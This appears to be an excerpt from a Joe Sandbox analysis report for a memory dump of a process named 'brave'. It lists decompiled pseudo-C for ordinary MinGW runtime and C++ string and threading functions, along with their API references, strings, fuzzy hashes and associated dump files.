Opcode Fuzzy Hash: f8158c71ef050e1e9cbf393265222da93de2fa9e8f3a0d98d13ba6446c91282d
Instruction Fuzzy Hash: 3301D272A0A70285EB109B26F94506937A4FB88FD8F088131DE0DC3748EF3DE492C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600F160 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6A600F1A0
calloc.MSVCRT ref: 00007FF6A600F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF6A600F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF6A600F1E9

Strings

!dso || dso == &__dso_handle, xrefs: 00007FF6A600F199
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF6A600F192

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave_assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 4191840866-4180103562
Opcode ID: f75f473cc27cf5f1c1fc51378073b3bce385c5a3abcb57c2d3be634da1e2c61d
Instruction ID: c17a612de154d6bb31d6e0438c9d9206c1aaf22ef43e1716f6280793f299881e
Opcode Fuzzy Hash: f75f473cc27cf5f1c1fc51378073b3bce385c5a3abcb57c2d3be634da1e2c61d
Instruction Fuzzy Hash: 35012964A1BA4795FB118B65EA551B522A4AF58F80F844030CA0DC7399EE6EF996C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600CDF0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600CDF0(void* __rax, void* __rcx, intOrPtr* __r8) {
				intOrPtr _t13;
				signed char _t14;
				signed long long _t41;

				if (__r8 == 0) goto 0xa600ce93;
				r13d = 1;
				goto 0xa600ce89;
				if ( *((intOrPtr*)(__r8 + 0x10)) != 0) goto 0xa600ce81;
				_t13 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
				if (r9d != 0) goto 0xa600ce45;
				_t14 = __rax - 0x1c;
				if (_t14 - 0x34 > 0) goto 0xa600ce45;
				if ((_t41 << _t14 & 0x0000001f) != 0) goto 0xa600ce81;
				 *((intOrPtr*)(__r8 + 0x10)) = 1;
				 *((long long*)(__rcx + 0x120)) =  *((intOrPtr*)(__r8 + 0x18));
				if (_t13 == 0x29) goto 0xa600cea0;
				if (_t13 == 0x2a) goto 0xa600cec4;
				if (_t13 == 2) goto 0xa600cee8;
				E00007FF67FF6A600C080();
				if ( *__r8 == 0) goto 0xa600ce93;
				if ( *((intOrPtr*)(__rcx + 0x130)) == 0) goto 0xa600ce20;
				return _t13;
			}

0x7ff6a600ce08
0x7ff6a600ce18
0x7ff6a600ce1e
0x7ff6a600ce25
0x7ff6a600ce2b
0x7ff6a600ce30
0x7ff6a600ce32
0x7ff6a600ce38
0x7ff6a600ce43
0x7ff6a600ce49
0x7ff6a600ce57
0x7ff6a600ce61
0x7ff6a600ce66
0x7ff6a600ce6b
0x7ff6a600ce75
0x7ff6a600ce87
0x7ff6a600ce91
0x7ff6a600ce9f

Strings

}::, xrefs: 00007FF6A600D0E9
default arg#, xrefs: 00007FF6A600CFEB
}, xrefs: 00007FF6A600D0F0
:, xrefs: 00007FF6A600CF06
{, xrefs: 00007FF6A600CFF2

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: :$default arg#${$}$}::
API String ID: 0-1396675520
Opcode ID: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction ID: 961541491564c2547e0118269a9161fb4b06eb1bb9fd8423476b981028a96e3c
Opcode Fuzzy Hash: 08332cc808a94058415bfcd868a3a9bd3ccee03719ae4bd389e3f5cf73b7d852
Instruction Fuzzy Hash: AF91B072A0A6C287E7698E25A5003FE6391EB05B98F494035CF9E47785DF7EE4E1D301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6017A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6A6017A70
GetCurrentThreadId.KERNEL32 ref: 00007FF6A6017A9D
printf.MSVCRT ref: 00007FF6A6017AD5

Strings

RWL%p %d %s, xrefs: 00007FF6A6017A7C
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s, xrefs: 00007FF6A6017AAB

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CurrentThread$printf
String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
API String ID: 2165381015-1971217749
Opcode ID: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction ID: 84e2defe48adee79bf0785e274b0b1584550ec79da5a02d6b2437e934bf2a777
Opcode Fuzzy Hash: 8cead37bc54ed6b6f1a314987bdb91882d6bbe9169badf4922341b7b210ccfed
Instruction Fuzzy Hash: C3019232A0AA4586E7119F15E94476977A0FB84FD8F084030DE0D83758DF3EE595CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6018E10 Relevance: 7.7, APIs: 5, Instructions: 186
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF67FF6A6018E10(void* __edx, long long __rax, long long __rcx, void* __r9) {
				long long _v48;
				char _v56;
				void* _t6;
				void* _t9;
				void* _t17;
				long long _t25;

				_t25 = __rax;
				r12d = r8d;
				if (__edx == 1) goto 0xa6018e90;
				_v56 = __rcx;
				E00007FF67FF6A6015420(__rax);
				_v48 = _t25;
				if (_t25 == 0) goto 0xa6018f20;
				r8d = 0;
				r9d = r12d;
				_t6 = E00007FF67FF6A6017560(2, _t25,  &_v56, __r9);
				_t17 = _t6 - 0x80;
				if (_t17 == 0) goto 0xa6019080;
				if (_t17 > 0) goto 0xa6018ed8;
				if (_t6 == 0) goto 0xa6018ec0;
				if (_t6 != 1) goto 0xa6019040;
				ResetEvent(??);
				if (__edx != 2) goto 0xa60190c9;
				E00007FF67FF6A60158E0(2, _t25,  &_v56);
				goto 0xa6018e45;
				_t9 = E00007FF67FF6A60174C0(r8d, _t25, _v48,  &_v56);
				if (_t9 == 0x80) goto 0xa601905d;
				if (_t9 == 0x102) goto 0xa6019058;
				r12d = 0x16;
				if (_t9 != 0) goto 0xa6018ec3;
				r12d = 0;
				return r12d;
			}

0x7ff6a6018e10
0x7ff6a6018e20
0x7ff6a6018e26
0x7ff6a6018e28
0x7ff6a6018e32
0x7ff6a6018e37
0x7ff6a6018e3f
0x7ff6a6018e45
0x7ff6a6018e48
0x7ff6a6018e53
0x7ff6a6018e58
0x7ff6a6018e5d
0x7ff6a6018e63
0x7ff6a6018e67
0x7ff6a6018e6c
0x7ff6a6018e77
0x7ff6a6018e80
0x7ff6a6018e86
0x7ff6a6018e8b
0x7ff6a6018e93
0x7ff6a6018e9d
0x7ff6a6018ea8
0x7ff6a6018eae
0x7ff6a6018eb6
0x7ff6a6018ec0
0x7ff6a6018ed1

APIs

Part of subcall function 00007FF6A6017560: WaitForMultipleObjects.KERNEL32 ref: 00007FF6A60175D4

ResetEvent.KERNEL32 ref: 00007FF6A6018E77
WaitForSingleObject.KERNEL32 ref: 00007FF6A6018EF0

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID:
API String ID: 256776027-0
Opcode ID: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction ID: 2a47a99a2e0bb46365c12f5b7a1ec0519430f79fcba98846798fba5fa47d432d
Opcode Fuzzy Hash: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction Fuzzy Hash: 3C512D11E0E40341FBB65626974637B80926F84F9CF544436DE1EC62D1FEAFEAE19231

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602EC70 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6A602EC82
memcpy.MSVCRT ref: 00007FF6A602ECD4
memcpy.MSVCRT ref: 00007FF6A602ED90

Strings

basic_string::append, xrefs: 00007FF6A602ED2A, 00007FF6A602EDE8

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction ID: 1f4c1673804591c71078884dd2bd5136772992d9bd17b2bb05652a6284fb583f
Opcode Fuzzy Hash: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction Fuzzy Hash: DE51CE62A4AA4580EE10DB25C5084BD2369FF95FC4B984672EF1D873E1EF3EE4A1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602BAC0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 158stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6A602BAD2
memcpy.MSVCRT ref: 00007FF6A602BB22
memcpy.MSVCRT ref: 00007FF6A602BBDD

Strings

basic_string::append, xrefs: 00007FF6A602BB7D, 00007FF6A602BC3B

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction ID: 9ff899791332e1d6c4bdbc20956a6c503f3438eeed390d69a27a8f6936b183c2
Opcode Fuzzy Hash: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction Fuzzy Hash: FE51D4A360AA4680DA11DB25C5985792364BF46FD8F9845B2EFAD873D2DF2ED491C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6030750 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6030750(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0xa60307c0;
				if (_t18 == 1) goto 0xa60307b0;
				if (_t18 != 0) goto 0xa60307a0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}

0x7ff6a603075a
0x7ff6a603075e
0x7ff6a6030769
0x7ff6a603076d
0x7ff6a6030770
0x7ff6a603077a
0x7ff6a6030780
0x7ff6a6030785
0x7ff6a6030789
0x7ff6a603078d
0x7ff6a603079b

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6030848, 00007FF6A603089F, 00007FF6A60308EF
basic_string::_M_create, xrefs: 00007FF6A60307F7
basic_string::basic_string, xrefs: 00007FF6A6030841, 00007FF6A6030898
string::string, xrefs: 00007FF6A60308E8

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction ID: 2cf630b520eeafcdbeb89af5106869efcf2a86432ad964bd7869a00ccef3ab36
Opcode Fuzzy Hash: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction Fuzzy Hash: 3841C872B07B46D4EA109F29D9408ACA364FB18FD4B945632CA1D87395EE3EE5E6C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6030290 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6030290(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0xa6030300;
				if (_t18 == 1) goto 0xa60302f0;
				if (_t18 != 0) goto 0xa60302e0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}

0x7ff6a603029a
0x7ff6a603029e
0x7ff6a60302a9
0x7ff6a60302ad
0x7ff6a60302b0
0x7ff6a60302ba
0x7ff6a60302c0
0x7ff6a60302c5
0x7ff6a60302c9
0x7ff6a60302cd
0x7ff6a60302db

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6030388, 00007FF6A60303DF, 00007FF6A603042F
basic_string::_M_create, xrefs: 00007FF6A6030337
basic_string::basic_string, xrefs: 00007FF6A6030381, 00007FF6A60303D8
string::string, xrefs: 00007FF6A6030428

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction ID: 718ab86fed2d18770f918d34d9eb17f014b8ed0b0ee528810681edb7d4cb8646
Opcode Fuzzy Hash: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction Fuzzy Hash: 7241D772B07B4595EB109F29D6408ACB364FB14FD4B945632CA2D87794EE3EE5E6C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6010640 Relevance: 7.6, APIs: 5, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6010640(void* __rax, intOrPtr* __rcx, void* __rdx) {
				void* _t4;
				void* _t20;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t24 = __rdx;
				_t20 = __rax;
				_t27 = __rcx;
				if (__rdx == 0) goto 0xa601066f;
				E00007FF67FF6A6017400(_t4, __rdx);
				E00007FF67FF6A60173B0(_t20, _t24);
				if (_t20 - _t20 > 0) goto 0xa60106b0;
				_t26 =  *_t27;
				_t1 = _t26 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0xa60106d1;
				if (_t26 == 0) goto 0xa60106e4;
				r13d = 1;
				 *_t26 = r13d;
				if ( *_t26 != 0) goto 0xa6010708;
				if ( *((intOrPtr*)(_t26 + 4)) != 0) goto 0xa60106f8;
				return 0;
			}

0x7ff6a6010640
0x7ff6a6010640
0x7ff6a6010650
0x7ff6a6010659
0x7ff6a601065b
0x7ff6a6010665
0x7ff6a601066d
0x7ff6a601066f
0x7ff6a6010673
0x7ff6a601067c
0x7ff6a6010681
0x7ff6a6010683
0x7ff6a601068c
0x7ff6a6010692
0x7ff6a601069b
0x7ff6a60106aa

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction ID: f42e8bd6518521deff2fe316bb25c9119e5264fc31c5a52ecbd407503f67d7c3
Opcode Fuzzy Hash: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction Fuzzy Hash: 0B41D822F0B25646FB659B159A4863B2294FF40B9CF144036DD6EC63C0EE7EE8D1C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60104E0 Relevance: 7.6, APIs: 5, Instructions: 102
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A60104E0(intOrPtr* __rcx) {
				intOrPtr* _t16;

				_t16 =  *((intOrPtr*)(__rcx));
				_t1 = _t16 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0xa6010540;
				if (_t16 == 0) goto 0xa6010550;
				 *_t16 = 1;
				if ( *_t16 != 0) goto 0xa6010560;
				if ( *((intOrPtr*)(_t16 + 4)) != 0) goto 0xa6010520;
				return 0;
			}

0x7ff6a60104e9
0x7ff6a60104ec
0x7ff6a60104f5
0x7ff6a60104fa
0x7ff6a6010503
0x7ff6a6010509
0x7ff6a6010512
0x7ff6a601051f

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6A6010520

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction ID: c87e3f4f9b5d9b2051bcb8541893b7324bd6e32b824a90b2cf42bceaac24428b
Opcode Fuzzy Hash: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
